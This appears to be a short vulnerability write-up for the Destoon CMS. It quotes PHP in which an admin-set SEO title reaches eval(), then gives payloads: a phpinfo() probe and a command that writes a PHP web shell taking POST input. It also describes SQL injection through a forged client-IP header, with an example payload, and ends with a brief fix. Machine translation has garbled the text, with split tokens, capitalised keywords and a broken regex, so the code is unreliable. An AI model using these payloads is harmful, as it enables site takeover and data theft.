# Team: makebugs
# Author: Fate
######################################## ####################################
// Common. inc. php
$ Moduleid = intval ($ moduleid );
Isset ($ MODULE [$ moduleid]) or dheader (DT_PATH );
$ Module = $ MODULE [$ moduleid] ['module'];
$ MOD = cache_read ('module-'. $ moduleid.'. php ');
Include DT_ROOT. '/lang/'. DT_LANG. '/'. $ module. '. inc. php ';
// Destoon \ module \ know \ index. inc. php
<? Php
// Www.2cto.com
If (! Check_group ($ _ groupid, $ MOD ['group _ Index']) {
$ Head_title = lang ('message-> without_permission ');
Include template ('noright ', 'message ');
Exit;
}
Include DT_ROOT. '/include/seo. inc. php ';
If ($ MOD ['seo _ Index']) {
Eval ("\ $ seo_title = \" $ MOD [seo_index] \ ";");
} Else {
$ Seo_title = $ seo_modulename. $ seo_delimiter. $ seo_sitename;
// Omitted
?>
Usage: Background Module Settings --- seo title: $ {{ {phpinfo ()}}
{Fputs (fopen ("path/5.php"," w ")," <? Eval (\$ _ POST [MakeBug]);?> ")}
Injection:
// \ Destoon \ include \ global. func. php
Function get_env ($ type ){
Switch ($ type ){
Case 'IP ':
$ DT_IP = '';
If (getenv ('HTTP _ CLIENT_IP ') & strcasecmp (getenv ('HTTP _ CLIENT_IP'), 'unknown ')){
$ DT_IP = getenv ('HTTP _ CLIENT_IP ');
} Elseif (getenv ('HTTP _ X_FORWARDED_FOR ') & strcasecmp (getenv ('HTTP _ X_FORWARDED_FOR'), 'unknown ')){
$ DT_IP = getenv ('HTTP _ X_FORWARDED_FOR ');
} Elseif (getenv ('remote _ ADDR ') & strcasecmp (getenv ('remote _ ADDR'), 'unknown ')){
$ DT_IP = getenv ('remote _ ADDR ');
} Elseif (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], 'unknown ')){
$ DT_IP = $ _ SERVER ['remote _ ADDR '];
}
Preg_match ("/^ \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3} $/", $ DT_IP) or $ DT_IP = 'unknown ';
Return $ DT_IP;
Break;
Regular expressions are not allowed. Only the number and. (the author only considers the issue similar to 127.0.0.1 .) Usage: 127.0.0.1 ', (SQL ))#
Www.2cto.com solution:
Set the title to filter illegal input. Just perform normal injection filtering.